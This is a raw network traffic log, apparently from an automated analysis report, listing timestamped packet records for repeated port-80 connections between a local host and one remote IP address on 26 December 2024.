                                                                                                                              Dec 26, 2024 17:17:34.047180891 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:34.047348976 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:34.047395945 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:34.632436037 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:34.677215099 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:34.753442049 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:34.802159071 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:34.892355919 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:34.942784071 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.010122061 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.067787886 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.190648079 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.190891027 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.192099094 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.310650110 CET8049759104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.310718060 CET4975980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.311104059 CET8049760104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.311165094 CET4976080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.311652899 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.311733007 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.331481934 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.451453924 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.677690029 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:35.797758102 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.797802925 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.797832966 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:35.897252083 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:36.016900063 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:36.017318010 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:36.019506931 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:36.139143944 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:36.364778042 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:36.484749079 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:36.484791040 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:36.489032984 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:36.536539078 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:36.741995096 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:36.788295984 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.194664955 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.253283024 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.347393036 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.348673105 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.450087070 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.467797995 CET8049761104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.467842102 CET4976180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.468318939 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.468378067 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.468619108 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.505283117 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.588148117 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.818181992 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:37.938894033 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.938954115 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:37.938983917 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:38.459095955 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.459667921 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.579408884 CET8049762104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:38.579476118 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:38.579489946 CET4976280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.579601049 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.579726934 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.645522118 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:38.692816019 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.699635983 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:38.902192116 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:38.927218914 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:38.942888021 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.017855883 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.018445969 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.048856974 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.048890114 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.141123056 CET8049763104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.141156912 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.141330004 CET4976380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.141375065 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.141527891 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.261044979 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.536778927 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:39.656681061 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.656724930 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.656754017 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.758711100 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:39.802156925 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.014126062 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:40.067774057 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.319360971 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:40.364654064 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.569905043 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:40.614655972 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.688704014 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.688725948 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.689407110 CET4976680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.808773994 CET8049764104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:40.808825970 CET4976480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.809014082 CET8049766104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:40.809211969 CET4976680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.809251070 CET8049765104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:40.809300900 CET4976580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.809346914 CET4976680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:40.928960085 CET8049766104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.084666967 CET4976680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.085163116 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.205024004 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.205717087 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.205760956 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.205862999 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.247615099 CET8049766104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.325544119 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.325581074 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.325679064 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.325777054 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.445302010 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.552483082 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.672209978 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.672687054 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.677310944 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.774705887 CET8049766104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.774887085 CET4976680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:41.797060013 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.797090054 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:41.797251940 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:42.384809017 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:42.429936886 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:42.504190922 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:42.552184105 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:42.638060093 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:42.692794085 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:42.762238979 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:42.802174091 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:42.892879009 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:42.893110991 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:42.893651009 CET4976980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.013099909 CET8049767104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.013154984 CET4976780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.013370991 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.013439894 CET4976980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.013448954 CET8049768104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.013500929 CET4976880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.013623953 CET4976980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.133277893 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.369827986 CET4976980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.489478111 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.489518881 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.489533901 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.647279024 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.647543907 CET4976980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.767066956 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.767335892 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.767446995 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.784142971 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.807467937 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.887197018 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.903831005 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.903899908 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.903995037 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:43.978610039 CET8049769104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:43.978677034 CET4976980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:44.023643970 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.114810944 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:44.234833956 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.234860897 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.261104107 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:44.520920038 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:44.558172941 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.558214903 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.558228016 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.640547037 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.947308064 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:44.989701033 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.081871033 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:45.130315065 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.198000908 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:45.239691973 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.338087082 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:45.395932913 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.631899118 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.631973982 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.636641979 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.751836061 CET8049770104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:45.751907110 CET4977080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.752201080 CET8049771104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:45.752260923 CET4977180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.756253004 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:45.757332087 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.757461071 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:45.878133059 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.114794016 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:46.210196018 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:46.234416962 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.234441042 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.234456062 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.329925060 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.330039978 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:46.330280066 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:46.449938059 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.677308083 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:46.796926975 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.796999931 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.937822104 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:46.989674091 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.189898014 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.239783049 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.316591978 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.317454100 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.436510086 CET8049772104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.437135935 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.437196970 CET4977280192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.437233925 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.437378883 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.507642984 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.552184105 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.556801081 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.762006998 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.786729097 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.817806005 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:47.906375885 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.906460047 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:47.906475067 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:48.620069027 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:48.661551952 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.771569967 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.772212982 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.869940996 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:48.891499043 CET8049773104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:48.891557932 CET4977380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.891758919 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:48.891916037 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.892041922 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.911561012 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.987032890 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:48.987796068 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:49.011487961 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.107215881 CET8049774104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.107275009 CET4977480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:49.107434988 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.107510090 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:49.107618093 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:49.227118015 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.239886999 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:49.359632969 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.359652996 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.458512068 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:49.578294992 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.578305006 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:49.578309059 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.068927050 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.114798069 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.286545038 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.321949005 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.333425045 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.364675999 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.537935019 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.583451986 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.658158064 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.658160925 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.659102917 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.778275013 CET8049775104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.778423071 CET4977580192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.778734922 CET8049776104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.778800011 CET4977680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.778971910 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:50.779057026 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.815862894 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:50.935462952 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:51.181303978 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:51.301047087 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:51.301058054 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:51.301068068 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:51.409895897 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:51.529479980 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:51.529541016 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:51.532876015 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:51.652416945 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:51.880644083 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:51.957221031 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.000324965 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.000334024 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.005321026 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.220014095 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.270945072 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.358006001 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.358669043 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.478004932 CET8049777104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.478075981 CET4977780192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.478147984 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.478622913 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.478810072 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.598557949 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.707736015 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.755315065 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.833553076 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:52.955986977 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.956023932 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.956070900 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:52.961911917 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:53.005311012 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:53.656728029 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:53.710942030 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:53.910047054 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:53.958439112 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.056623936 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.056976080 CET4977980192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.145752907 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.176520109 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.176683903 CET8049778104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.176734924 CET4977880192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.265279055 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.265346050 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.265453100 CET4978080192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:17:54.384949923 CET8049780104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.391046047 CET8049779104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:17:54.391237974 CET4977980192.168.2.4104.21.93.162
